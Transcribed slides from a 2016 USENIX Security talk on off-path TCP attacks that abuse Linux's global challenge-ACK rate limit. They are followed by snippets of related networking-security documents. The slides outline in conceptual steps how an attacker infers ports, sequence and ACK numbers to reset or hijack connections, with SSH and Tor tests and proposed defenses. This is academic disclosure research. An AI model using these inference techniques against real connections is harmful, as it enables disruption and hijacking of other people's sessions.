Off-Path TCP Exploits : Global Rate Limit Considered Dangerous
|
|
- Hugh Johnston
- 6 years ago
- Views:
Transcription
1 Off-Path TCP Exploits : Global Rate Limit Considered Dangerous Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V. Krishnamurthy, University of California, Riverside; Lisa M. Marvel, United States Army Research Laboratory. 25th USENIX Security Symposium, (August, 2016) 1
2 Threat Model Pure blind off-path TCP attack No MITM needed Without running any malicious code on client or server 2
3 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 3
4 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 4
5 Transmission Control Protocol A B SYN Seq=30 ACK Seq=31 ack=92 Seq=31, ack=100 Seq=31, ack=108 SYN/ACK Seq=91 ack=31 Seq=92, 8 bytes data Seq=100, 8 bytes data 5
6 Sequence Number 4G 0 RCV.WND RCV.NXT RCV.NXT + RCV.WND 6
7 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 7
8 Blind in-window attacks Connection termination Data Injection Success requirements <src IP, src port, dst IP, dst port> Proper Sequence Number 8
9 Blind in-window attacks B A Seq=92, 8B data Seq=100, 8B data Seq=31, ack=100 Seq=31, ack=108 SYN (A s IP Address) 9
10
11 A RFC-5961 (SYN) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> SYN (A s IP) Seq # before RFC 5961 In window Out of window Reset ACK back Challenge ACK Challenge ACK 11
12 A RFC-5961 (SYN) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> RST Good Seq # SYN (A s IP) Seq # before RFC 5961 In window Out of window Reset ACK back Challenge ACK Challenge ACK 12
13 A RFC-5961 (SYN) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> Seq=30 8B data Duplicated ACK Ack=38 Ack=38 SYN (A s IP) Seq # before RFC 5961 In window Out of window Reset ACK back Challenge ACK Challenge ACK 13
14 Blind in-window attacks A B Seq=92, 8B data Seq=31, ack=100 SYN RST (A s IP Address) 14
15 A RFC-5961 (RST) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> RST (A s IP) Seq # before RFC 5961 Match Reset Reset In window Out of window Drop Challenge ACK Drop 15
16 A RFC-5961 (RST) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> Seq # before RFC 5961 Match Reset RST (A s IP) RST Good Seq # In window Out of window Reset Drop Challenge ACK Drop 16
17 A RFC-5961 (RST) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> RST (A s IP) Seq # before RFC 5961 Match Reset Duplicated ACK In window Reset Challenge ACK Out of window Drop Drop 17
18 Blind in-window attacks A B Seq=92, 8B data Seq=31, ack=100 Data (A s IP Address) Seq number : in-window? ACK number? 18
19 Before SND.UNA 2G Accepted(O) X SND.UNA SND.NXT RFC 5961 SND.UNA 2G SND.UNA SND.MAX.WIN Challenged ACK (X) Accepted SND.UNA (O) X SND.NXT 19
20 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 20
21 ACK Throttling 21
22 ACK Throttling In order to reduce the number of challenge ACK packets that waste CPU and bandwidth resources Linux kernel has faithfully implemented this feature storing the counter in a global variable : sysctl_tcp_challenge_ack_limit control the maximum number of challenge ACKs generated per second 22
23 sysctl_tcp_challenge_ack_limit set to 100 by default shared by all TCP connections Attackers can get some information here! 23
24 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 24
25 RFC 5961 The acceptable SYN Packet needs : <src IP, src port, dst IP, dst port> In-window sequence number The acceptable RST Packet needs : <src IP, src port, dst IP, dst port> Correct sequence number The acceptable Data Packet needs : <src IP, src port, dst IP, dst port> In-window sequence number Acceptable ACK number 25
26 A RFC-5961 (SYN) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> Seq=30 8B data Ack=38 Ack=38 SYN (A s IP) Seq # before RFC 5961 In window Out of window Reset ACK back Challenge ACK Challenge ACK 26
27 Assume No Packet Loss First 27
28 src port Remain 100 SYN or SYN/ACK (client s IP) Remain 99 RST*100 Remain 0 Challenge ACK*99 28
29 src port Remain 100 RST Remain 100 SYN or SYN/ACK (client s IP) RST*100 Remain 0 Challenge ACK*100 29
30 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 30
31 Connection Reset Attack Send spoofed RST arrives with a matching sequence number of RCV.NXT. Problems : Time Synchronization Four-tuple Sequence Number 31
32 Time Problem SYN or SYN/ACK (client s IP) 1s RST*100 Challenge ACK*99 32
33 Time Problem 1s SYN or SYN/ACK (client s IP) RST*100 Challenge ACK*100 33
34 Synchronization - 1 1s RST*200 Challenge ACK = n1 Spread 200 RST packet in 1-second interval due to bandwidth limit. => 1 pkt every 5ms If(n1 == 100) synchronized! If(n1 > 100) next round! 34
35 Synchronization - 2 1s RST*200 Delay 5 ms to send those 200 RST packet => Delay 1 packet Challenge ACK = n2 If(n2 == 100) synchronized! If(n2 > 100) next round! 35
36 Synchronization 3 : Compare Assume x RST packets arrive in the first 1-second interval on the server, and y packets arrive in the second interval in step 1 n1 = min(x,100)+min(y,100) Assume (x-1) RST packets arrive in the first 1- second interval on the server, and (y+1) packets arrive in the second interval in step 2 n2 = min(x 1,100)+min(y+1,100) 36
37 Synchronization 3 : Compare Assume n1 > n2 X Y 100 X-1 Y+1 Delay = (n2 100) (sec) 37
38 Synchronization 3 : Compare Assume n2 > n1 X 100 X-1 Y+1 Y n2 = y + 1 = x + 1 x 1 = 300 n2 Delay = (300 n2) (sec) 38
39 Four-tuple src port number 39
40 A RFC-5961 (SYN) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> Seq=30 8B data Ack=38 Ack=38 SYN (A s IP) Seq # before RFC 5961 In window Out of window Reset ACK back Challenge ACK Challenge ACK 40
41 Binary search for port number The maximum possible port range is 2 16 = Binary search Test the port from to in first round If the port number doesn't fall in this range, then it must fall in the another range The attacker can narrow down the space by half each time 41
42 42
43 43
44 Search for port number The maximum number of packets that can be sent in 1 second may be limited (1-1000?) In this case, the attacker can do is to simply try as many port numbers as possible in each round 44
45 Search for seq number 45
46 A RFC-5961 (RST) B Challenge ACK : <SEQ=SND.NXT><ACK=RCV.NXT> <CTL=ACK> RST (A s IP) Seq # before RFC 5961 Match Reset In window Out of window Reset Drop Challenge ACK Drop 46
47 Search for seq number The attacker simply attempts to establish a nonspoofed TCP connection with the server to get the the initial window size on server Divide the sequence number space into blocks whose sizes are equal to the receive window size 0 4G Block =Window size 47
48 1.Search for Block Size RST Seq 0 RST Seq=2WIN if(received Challenge ACK = 100) not in this chunk if(received Challenge ACK = 99) in this chunk if(received Challenge ACK < 99) blocksize = blocksize *2 0 4G Chunk 48
49 Search for Block Size 49
50 Search for seq number RST RST RST Chunk 50
51 Mulit-bin Search for seq number if(received Challenge ACK = 99) block 0 if(received Challenge ACK = 98) block 1 if(received Challenge ACK = 97) block 2 etc RST 2*RST 3*RST 4*RST Chunk 51
52 Search for RCV.NXT Any spoofed RST packet with a sequence number less than RCV.NXT will not trigger a challenge ACK packet. Block = Window size 52
53 Mulit-bin Search for RCV.NXT if(received Challenge ACK = 100) block 0 if(received Challenge ACK = 99) block 1 if(received Challenge ACK = 98) block 2 Etc RST RST RST RST Block 53
54 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 54
55 Connection Hijacking Attack inject spoofed data! Problems : Time Synchronization Four-tuple Sequence Number Preventing connection reset ACK number 55
56 56
57 Before SND.UNA 2G Accepted(O) X SND.UNA SND.NXT RFC 5961 SND.UNA 2G SND.UNA SND.MAX.WIN Challenged ACK (X) Accepted SND.UNA (O) X SND.NXT 57
58 ACK number According to RFC 1323, MAX.SND.WND can be extended from 2 16 to a maximum of 1G the challenge ACK window size is between 1G and 2G 58
59 Before SND.UNA 2G Accepted(O) X SND.UNA SND.NXT RFC 5961 SND.UNA 2G SND.UNA SND.MAX.WIN Challenged ACK (X) Accepted SND.UNA (O) X SND.NXT 59
60 ACK number The Attacker can send 1 packet at ACK number 0, 2 packets at 1G, 4 packets at 2G, 8 packets at 3G. ACK ACK*8 ACK*2 ACK*4 60
61 ACK number Once we got the information about challenge ACK window in the previous step, we can now use the search method to find SND.UNA (2 31 1). When SND.UNA (2 31 1) is found, an acceptable ACK value (SND.UNA) can be computed. SND.UNA 2G Accepted (O) SND.UNA 61
62 Preventing connection reset Assuming an in-window sequence number is already inferred Spoofed data packets with ACK numbers that fall in the challenge ACK window and thus, intentionally trigger challenge ACKs If the guessed sequence number is before RCV.NXT, no challenge ACK will be triggered 62
63 Packet Loss Every time when a plausible chunk is detected, we repeat the probe on the same chunk Instead of sending 1, 2, or 3 packets, sending 1, 3, and 5 packets for each block. If an even number of challenge ACKs is received, packet loss must have happened 63
64 Moving window once a left-most in-window seq number is inferred, send 20,000 RST packets with sequence numbers, with offset 1, 2,..., 20,000 to the valid sequence number 64
65 Configurable maximum challenge ACK count Establishing a legitimate connection The attacker can send many RST packets which is much larger than 100, with in-window sequence values to trigger as many challenge ACKs as possible. 65
66 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 66
67 SSH Connection Reset Victim SSH Server : Amazon EC2 (worldwide) Victim Client : Ubuntu (University of California - Riverside ) Attacker : Ubuntu host in lab 67
68 SSH Connection Reset 68
69 SSH Connection Reset 69
70 SSH Connection Reset 70
71 Tor Connection Reset Tor Relay : Ubuntu (University of California - Riverside ) Running for several months Having a user using it Attacker : Ubuntu host (in lab) (in lab) (out) 71
72 Tor Connection Reset Test between our own Tor relay and 40 other Tor relays 16 of them do not appear vulnerable to the side channel attacks For the remaining 24 hosts, Average success rate is 88.8% Average time is 51.1s. 72
73 Moving Window 73
74 TCP Hijacking Case Study : long-lived TCP connection Periodically retrieves news updates every 30 seconds. Attacker machine : Ubuntu (in lab) victim client : Ubuntu (in lab) 74
75 TCP Hijacking Case Study 75
76 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 76
77 Defense Windows, Mac OS X and FreeBSD do not implemented all three conditions that trigger challenge ACKs according to RFC Each connection has a completely separate counter Use random values for each ACK throttling interval 77
78 Outline Background Knowledge TCP connection (pre-rfc 5961) Blind in-window attacks & RFC 5961 Problems in RFC 5961 Attack Method Main idea Connection Reset Attack Connection Hijacking Attack Evaluation Defense Related Works & Conclusion 78
79 Related Works Off-path TCP sequence number inference relies on executing malicious code on the client side [22] [23] [14] [16] [17] [1] Other types of information can be inferred by an TCP sequence number [12] [21] [11] [29] [5] [15]. 79
80 Conclusions we have discovered a subtle yet critical flaw in the design and implementation of TCP. The flaw manifests as a side channel that affects all Linux kernel versions 3.6 and beyond and may possibly be replicated in other operating systems if left unnoticed. 80
81 Questions? 81
IEEE/ACM TRANSACTIONS ON NETWORKING, VOL. 26, NO. 2, APRIL
IEEE/ACM TRANSACTIONS ON NETWORKING, VOL. 26, NO. 2, APRIL 2018 765 Off-Path TCP Exploits of the Challenge ACK Global Rate Limit Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, Srikanth V. Krishnamurthy,
More informationOff-Path TCP Exploit: How Wireless Routers Can Jeopardize Your Secrets
Off-Path TCP Exploit: How Wireless Routers Can Jeopardize Your Secrets Weiteng Chen and Zhiyun Qian, University of California, Riverside https://www.usenix.org/conference/usenixsecurity18/presentation/chen-weiteng
More informationYour State is Not Mine: A Closer Look at Evading Stateful Internet Censorship
Your State is Not Mine: A Closer Look at Evading Stateful Internet Censorship Zhongjie Wang, Yue Cao, Zhiyun Qian, Chengyu Song, Srikanth V Krishnamurthy University of California, Riverside 1 Internet
More informationTwo approaches to Flow Control. Cranking up to speed. Sliding windows in action
CS314-27 TCP: Transmission Control Protocol IP is an unreliable datagram protocol congestion or transmission errors cause lost packets multiple routes may lead to out-of-order delivery If senders send
More informationTCP/IP Attack Lab. 1 Lab Overview. 2 Lab Environment. 2.1 Environment Setup. SEED Labs TCP/IP Attack Lab 1
SEED Labs TCP/IP Attack Lab 1 TCP/IP Attack Lab Copyright c 2006-2016 Wenliang Du, Syracuse University. The development of this document was partially funded by the National Science Foundation under Award
More informationInternet Layers. Physical Layer. Application. Application. Transport. Transport. Network. Network. Network. Network. Link. Link. Link.
Internet Layers Application Application Transport Transport Network Network Network Network Link Link Link Link Ethernet Fiber Optics Physical Layer Wi-Fi ARP requests and responses IP: 192.168.1.1 MAC:
More informationBasic NAT Example Security Recitation. Network Address Translation. NAT with Port Translation. Basic NAT. NAT with Port Translation
Basic Example 6.829 Security Recitation Rob Beverly November 17, 2006 Company C 10k machines in 128.61.0.0/16 ISP B 128.61.23.2 21.203.19.201 128.61.19.202 21.203.19.202 Network Address
More informationTCP/IP Performance ITL
TCP/IP Performance ITL Protocol Overview E-Mail HTTP (WWW) Remote Login File Transfer TCP UDP IP ICMP ARP RARP (Auxiliary Services) Ethernet, X.25, HDLC etc. ATM 4/30/2002 Hans Kruse & Shawn Ostermann,
More informationSome of the slides borrowed from the book Computer Security: A Hands on Approach by Wenliang Du. TCP Attacks. Chester Rebeiro IIT Madras
Some of the slides borrowed from the book Computer Security: A Hands on Approach by Wenliang Du TCP Attacks Chester Rebeiro IIT Madras A Typical TCP Client 2 A Typical TCP Server create a IPV4 stream socket
More informationDenial of Service and Distributed Denial of Service Attacks
Denial of Service and Distributed Denial of Service Attacks Objectives: 1. To understand denial of service and distributed denial of service. 2. To take a glance about DoS techniques. Distributed denial
More informationRob Sherwood Bobby Bhattacharjee Ryan Braud. University of Maryland. Misbehaving TCP Receivers Can Cause Internet-Wide Congestion Collapse p.
Rob Sherwood Bobby Bhattacharjee Ryan Braud University of Maryland UCSD Misbehaving TCP Receivers Can Cause Internet-Wide Congestion Collapse p.1 Sender Receiver Sender transmits packet 1:1461 Time Misbehaving
More informationAN TOÀN LỚP 4: TCP/IP ATTACKS NGUYEN HONG SON PTITHCM
1 AN TOÀN LỚP 4: TCP/IP ATTACKS NGUYEN HONG SON PTITHCM 2 Introduction (1/2) TCP provides a full duplex reliable stream connection between two end points A connection is uniquely defined by the quadruple
More informationEXPERIMENTAL STUDY OF FLOOD TYPE DISTRIBUTED DENIAL-OF- SERVICE ATTACK IN SOFTWARE DEFINED NETWORKING (SDN) BASED ON FLOW BEHAVIORS
EXPERIMENTAL STUDY OF FLOOD TYPE DISTRIBUTED DENIAL-OF- SERVICE ATTACK IN SOFTWARE DEFINED NETWORKING (SDN) BASED ON FLOW BEHAVIORS Andry Putra Fajar and Tito Waluyo Purboyo Faculty of Electrical Engineering,
More informationOutline. What is TCP protocol? How the TCP Protocol Works SYN Flooding Attack TCP Reset Attack TCP Session Hijacking Attack
Attacks on TCP Outline What is TCP protocol? How the TCP Protocol Works SYN Flooding Attack TCP Reset Attack TCP Session Hijacking Attack TCP Protocol Transmission Control Protocol (TCP) is a core protocol
More informationCS 161 Computer Security
Raluca Ada Popa Spring 2018 CS 161 Computer Security Discussion 7 Week of March 5, 2018 Question 1 DHCP (5 min) Professor Raluca gets home after a tiring day writing papers and singing karaoke. She opens
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 18: Network Attacks Department of Computer Science and Engineering University at Buffalo 1 Lecture Overview Network attacks denial-of-service (DoS) attacks SYN
More informationCYBER ATTACKS EXPLAINED: PACKET SPOOFING
CYBER ATTACKS EXPLAINED: PACKET SPOOFING Last month, we started this series to cover the important cyber attacks that impact critical IT infrastructure in organisations. The first was the denial-of-service
More informationSequence Number. Acknowledgment Number. Checksum. Urgent Pointer plus Sequence Number indicates end of some URGENT data in the packet
TCP Urgent Source Port Destination Port Sequence Number Acknowledgment Number HdrLen Reserved UA P RS F Checksum Window Size Urgent Pointer Urgent Pointer plus Sequence Number indicates end of some URGENT
More informationOur Narrow Focus Computer Networking Security Vulnerabilities. Outline Part II
Our Narrow Focus 15-441 15-441 Computer Networking 15-641 Lecture 22 Security: DOS Peter Steenkiste Fall 2016 www.cs.cmu.edu/~prs/15-441-f16 Yes: Creating a secure channel for communication (Part I) Protecting
More informationTCP Service Model. Today s Lecture. TCP Support for Reliable Delivery. EE 122:TCP, Connection Setup, Reliability
Today s Lecture How does TCP achieve correct operation? EE 122:TCP, Connection Setup, Reliability Ion Stoica TAs: Junda Liu, DK Moon, David Zats Reliability in the face of IP s best effort service 3-way
More informationDetecting Distributed Denial-of. of-service Attacks by analyzing TCP SYN packets statistically. Yuichi Ohsita Osaka University
Detecting Distributed Denial-of of-service Attacks by analyzing TCP SYN packets statistically Yuichi Ohsita Osaka University Contents What is DDoS How to analyze packet Traffic modeling Method to detect
More informationCommunication Networks ( ) / Fall 2013 The Blavatnik School of Computer Science, Tel-Aviv University. Allon Wagner
Communication Networks (0368-3030) / Fall 2013 The Blavatnik School of Computer Science, Tel-Aviv University Allon Wagner Several slides adapted from a presentation made by Dan Touitou on behalf of Cisco.
More information20-CS Cyber Defense Overview Fall, Network Basics
20-CS-5155 6055 Cyber Defense Overview Fall, 2017 Network Basics Who Are The Attackers? Hackers: do it for fun or to alert a sysadmin Criminals: do it for monetary gain Malicious insiders: ignores perimeter
More informationDenial of Service (DoS) attacks and countermeasures
Dipartimento di Informatica Università di Roma La Sapienza Denial of Service (DoS) attacks and countermeasures Definitions of DoS and DDoS attacks Denial of Service (DoS) attacks and countermeasures A
More informationResilience of Deployed TCP to Blind Attacks
Resilience of Deployed TCP to Blind Attacks Matthew Luckie University of Waikato mjl@wand.net.nz Mark Allman ICSI mallman@icir.org Robert Beverly Naval Postgraduate School rbeverly@nps.edu kc claffy CAIDA
More informationTCP TCP/IP: TCP. TCP segment. TCP segment. TCP encapsulation. TCP encapsulation 1/25/2012. Network Security Lecture 6
TCP TCP/IP: TCP Network Security Lecture 6 Based on IP Provides connection-oriented, reliable stream delivery service (handles loss, duplication, transmission errors, reordering) Provides port abstraction
More informationCSC 574 Computer and Network Security. TCP/IP Security
CSC 574 Computer and Network Security TCP/IP Security Alexandros Kapravelos kapravelos@ncsu.edu (Derived from slides by Will Enck and Micah Sherr) Network Stack, yet again Application Transport Network
More informationConfiguring attack detection and prevention 1
Contents Configuring attack detection and prevention 1 Overview 1 Attacks that the device can prevent 1 Single-packet attacks 1 Scanning attacks 2 Flood attacks 3 TCP fragment attack 4 Login DoS attack
More informationLayer 4: UDP, TCP, and others. based on Chapter 9 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers
Layer 4: UDP, TCP, and others based on Chapter 9 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers Concepts application set transport set High-level, "Application Set" protocols deal only with how handled
More informationNetwork Security. Thierry Sans
Network Security Thierry Sans HTTP SMTP DNS BGP The Protocol Stack Application TCP UDP Transport IPv4 IPv6 ICMP Network ARP Link Ethernet WiFi The attacker is capable of confidentiality integrity availability
More informationCorrecting mistakes. TCP: Overview RFCs: 793, 1122, 1323, 2018, TCP seq. # s and ACKs. GBN in action. TCP segment structure
Correcting mistakes Go-back-N: big picture: sender can have up to N unacked packets in pipeline rcvr only sends cumulative acks doesn t ack packet if there s a gap sender has r for oldest unacked packet
More informationInternetwork Expert s CCNA Security Bootcamp. Common Security Threats
Internetwork Expert s CCNA Security Bootcamp Common Security Threats http:// Today s s Network Security Challenge The goal of the network is to provide high availability and easy access to data to meet
More informationLecture 6: Worms, Viruses and DoS attacks. II. Relationships between Biological diseases and Computers Viruses/Worms
CS 4740/6740 Network Security Feb. 09, 2011 Lecturer: Ravi Sundaram I. Worms and Viruses Lecture 6: Worms, Viruses and DoS attacks 1. Worms They are self-spreading They enter mostly thru some security
More informationCisco IOS Classic Firewall/IPS: Configuring Context Based Access Control (CBAC) for Denial of Service Protection
Cisco IOS Classic Firewall/IPS: Configuring Context Based Access Control (CBAC) for Denial of Service Protection Document ID: 98705 Contents Introduction Prerequisites Requirements Components Used Conventions
More informationHands-On Ethical Hacking and Network Defense
Hands-On Ethical Hacking and Network Defense Chapter 2 TCP/IP Concepts Review Last modified 1-11-17 Objectives Describe the TCP/IP protocol stack Explain the basic concepts of IP addressing Explain the
More informationMPTCP: Design and Deployment. Day 11
MPTCP: Design and Deployment Day 11 Use of Multipath TCP in ios 7 Multipath TCP in ios 7 Primary TCP connection over WiFi Backup TCP connection over cellular data Enables fail-over Improves performance
More informationELEC5616 COMPUTER & NETWORK SECURITY
ELEC5616 COMPUTER & NETWORK SECURITY Lecture 17: Network Protocols I IP The Internet Protocol (IP) is a stateless protocol that is used to send packets from one machine to another using 32- bit addresses
More informationCategory: Informational May 1996
Network Working Group S. Bellovin Request for Comments: 1948 AT&T Research Category: Informational May 1996 Status of This Memo Defending Against Sequence Number Attacks This memo provides information
More informationInternet Protocol and Transmission Control Protocol
Internet Protocol and Transmission Control Protocol CMSC 414 November 13, 2017 Internet Protcol Recall: 4-bit version 4-bit hdr len 8-bit type of service 16-bit total length (bytes) 8-bit TTL 16-bit identification
More informationA Study on Intrusion Detection Techniques in a TCP/IP Environment
A Study on Intrusion Detection Techniques in a TCP/IP Environment C. A. Voglis and S. A. Paschos Department of Computer Science University of Ioannina GREECE Abstract: The TCP/IP protocol suite is the
More informationTransport Layer. <protocol, local-addr,local-port,foreign-addr,foreign-port> ϒ Client uses ephemeral ports /10 Joseph Cordina 2005
Transport Layer For a connection on a host (single IP address), there exist many entry points through which there may be many-to-many connections. These are called ports. A port is a 16-bit number used
More informationMan In The Middle Project completed by: John Ouimet and Kyle Newman
Man In The Middle Project completed by: John Ouimet and Kyle Newman What is MITM? Man in the middle attacks are a form of eves dropping where the attacker relays messages that are sent between victims
More informationProtocol Overview. TCP/IP Performance. Connection Types in TCP/IP. Resource Management. Router Queues. Control Mechanisms ITL
Protocol Overview TCP/IP Performance E-Mail HTTP (WWW) Remote Login File Transfer TCP UDP ITL IP ICMP ARP RARP (Auxiliary Services) ATM Ethernet, X.25, HDLC etc. 2/13/06 Hans Kruse & Shawn Ostermann, Ohio
More informationQuestion No: 2 Which identifier is used to describe the application or process that submitted a log message?
Volume: 65 Questions Question No: 1 Which definition of a fork in Linux is true? A. daemon to execute scheduled commands B. parent directory name of a file pathname C. macros for manipulating CPU sets
More informationCIT 480: Securing Computer Systems
CIT 480: Securing Computer Systems Scanning CIT 480: Securing Computer Systems Slide #1 Topics 1. Port Scanning 2. Stealth Scanning 3. Version Identification 4. OS Fingerprinting CIT 480: Securing Computer
More informationNetwork Security (NetSec)
Chair of Network Architectures and Services Department of Informatics Technical University of Munich Network Security (NetSec) IN2101 WS 17/18 Prof. Dr.-Ing. Georg Carle Dr. Heiko Niedermayer Quirin Scheitle
More informationDan Boneh, John Mitchell, Dawn Song. Denial of Service
Dan Boneh, John Mitchell, Dawn Song Denial of Service What is network DoS? Goal: take out a large site with little computing work How: Amplification Small number of packets big effect Two types of amplification
More informationConfiguring attack detection and prevention 1
Contents Configuring attack detection and prevention 1 Overview 1 Attacks that the device can prevent 1 Single-packet attacks 1 Scanning attacks 2 Flood attacks 3 TCP fragment attack 4 Login DoS attack
More informationnetwork security s642 computer security adam everspaugh
network security s642 adam everspaugh ace@cs.wisc.edu computer security today Announcement: HW3 to be released WiFi IP, TCP DoS, DDoS, prevention 802.11 (wifi) STA = station AP = access point BSS = basic
More informationFall 2012: FCM 708 Bridge Foundation I
Fall 2012: FCM 708 Bridge Foundation I Prof. Shamik Sengupta Instructor s Website: http://jjcweb.jjay.cuny.edu/ssengupta/ Blackboard Website: https://bbhosted.cuny.edu/ Intro to Computer Networking Transport
More informationOutline. TCP: Overview RFCs: 793, 1122, 1323, 2018, Development of reliable protocol Sliding window protocols
Outline Development of reliable protocol Sliding window protocols Go-Back-N, Selective Repeat Protocol performance Sockets, UDP, TCP, and IP UDP operation TCP operation connection management flow control
More informationChapter 3 outline. 3.5 Connection-oriented transport: TCP. 3.6 Principles of congestion control 3.7 TCP congestion control
Chapter 3 outline 3.1 Transport-layer services 3.2 Multiplexing and demultiplexing 3.3 Connectionless transport: UDP 3.4 Principles of reliable data transfer 3.5 Connection-oriented transport: TCP segment
More informationARP, IP, TCP, UDP. CS 166: Introduction to Computer Systems Security 4/7/18 ARP, IP, TCP, UDP 1
ARP, IP, TCP, UDP CS 166: Introduction to Computer Systems Security 4/7/18 ARP, IP, TCP, UDP 1 IP and MAC Addresses Devices on a local area network have IP addresses (network layer) MAC addresses (data
More informationDenial of Service. EJ Jung 11/08/10
Denial of Service EJ Jung 11/08/10 Pop Quiz 3 Write one thing you learned from today s reading Write one thing you liked about today s reading Write one thing you disliked about today s reading Announcements
More informationLecture 6. Internet Security: How the Internet works and some basic vulnerabilities. Thursday 19/11/2015
Lecture 6 Internet Security: How the Internet works and some basic vulnerabilities Thursday 19/11/2015 Agenda Internet Infrastructure: Review Basic Security Problems Security Issues in Routing Internet
More informationECE 435 Network Engineering Lecture 9
ECE 435 Network Engineering Lecture 9 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 2 October 2018 Announcements HW#4 was posted, due Thursday 1 HW#3 Review md5sum/encryption,
More informationModule : ServerIron ADX Packet Capture
Module : ServerIron ADX Packet Capture Objectives Upon completion of this module, you will be able to: Describe Brocade ServerIron ADX (ADX) Packet Capture feature Configure and verify the Packet Capture
More informationFirewalls, Tunnels, and Network Intrusion Detection
Firewalls, Tunnels, and Network Intrusion Detection 1 Intrusion Detection Systems Intrusion Actions aimed at compromising the security of the target (confidentiality, integrity, availability of computing/networking
More informationEE 122: Network Security
Motivation EE 122: Network Security Kevin Lai December 2, 2002 Internet currently used for important services - financial transactions, medical records Could be used in the future for critical services
More informationLecture 10. Denial of Service Attacks (cont d) Thursday 24/12/2015
Lecture 10 Denial of Service Attacks (cont d) Thursday 24/12/2015 Agenda DoS Attacks (cont d) TCP DoS attacks DNS DoS attacks DoS via route hijacking DoS at higher layers Mobile Platform Security Models
More informationStealthwatch System v6.9.0 Internal Alarm IDs
Stealthwatch System v6.9.0 Internal Alarm IDs Copyrights and Trademarks 2017 Cisco Systems, Inc. All rights reserved. NOTICE THE SPECIFICATIONS AND INFORMATION REGARDING THE PRODUCTS IN THIS MANUAL ARE
More informationOutline. TCP: Overview RFCs: 793, 1122, 1323, 2018, steam: r Development of reliable protocol r Sliding window protocols
Outline r Development of reliable protocol r Sliding window protocols m Go-Back-N, Selective Repeat r Protocol performance r Sockets, UDP, TCP, and IP r UDP operation r TCP operation m connection management
More informationICS 451: Today's plan. Sliding Window Reliable Transmission Acknowledgements Windows and Bandwidth-Delay Product Retransmission Timers Connections
ICS 451: Today's plan Sliding Window Reliable Transmission Acknowledgements Windows and Bandwidth-Delay Product Retransmission Timers Connections Alternating Bit Protocol: throughput tied to latency with
More informationMonitoring and diagnostics of data infrastructure problems in power engineering. Jaroslav Stusak, Sales Director CEE, Flowmon Networks
Monitoring and diagnostics of data infrastructure problems in power engineering Jaroslav Stusak, Sales Director CEE, Flowmon Networks 35,000 kilometers of electric power, which feeds around 740,000 clients...
More informationCisco Stealthwatch. Internal Alarm IDs 7.0
Cisco Stealthwatch Internal Alarm IDs 7.0 Stealthwatch Internal Alarm IDs Some previously used alarms are now obsolete and no longer listed in this file. 1 Host Lock Violation 5 SYN Flood 6 UDP Flood 7
More informationTCP Congestion Control With a Misbehaving Receiver
TCP Congestion Control With a Misbehaving Receiver Stefan Savage, Neal Cardwell, David Wetherall and Tom Anderson - Pavan Kumar Panjam Congestion Control Congestion is a situation in Communication Networks
More information20: Networking (2) TCP Socket Buffers. Mark Handley. TCP Acks. TCP Data. Application. Application. Kernel. Kernel. Socket buffer.
20: Networking (2) Mark Handley TCP Socket Buffers Application Application Kernel write Kernel read Socket buffer Socket buffer DMA DMA NIC TCP Acks NIC TCP Data 1 TCP Socket Buffers Send-side Socket Buffer
More informationCSC 8560 Computer Networks: TCP
CSC 8560 Computer Networks: TCP Professor Henry Carter Fall 2017 Project 2: mymusic You will be building an application that allows you to synchronize your music across machines. The details of which are
More informationCovert channels in TCP/IP: attack and defence
Covert channels in TCP/IP: attack and defence The creation and detection of TCP/IP steganography for covert channels and device fingerprinting Steven J. Murdoch and Stephen Lewis http://www.cl.cam.ac.uk/users/{sjm217,
More informationFast Retransmit. Problem: coarsegrain. timeouts lead to idle periods Fast retransmit: use duplicate ACKs to trigger retransmission
Fast Retransmit Problem: coarsegrain TCP timeouts lead to idle periods Fast retransmit: use duplicate ACKs to trigger retransmission Packet 1 Packet 2 Packet 3 Packet 4 Packet 5 Packet 6 Sender Receiver
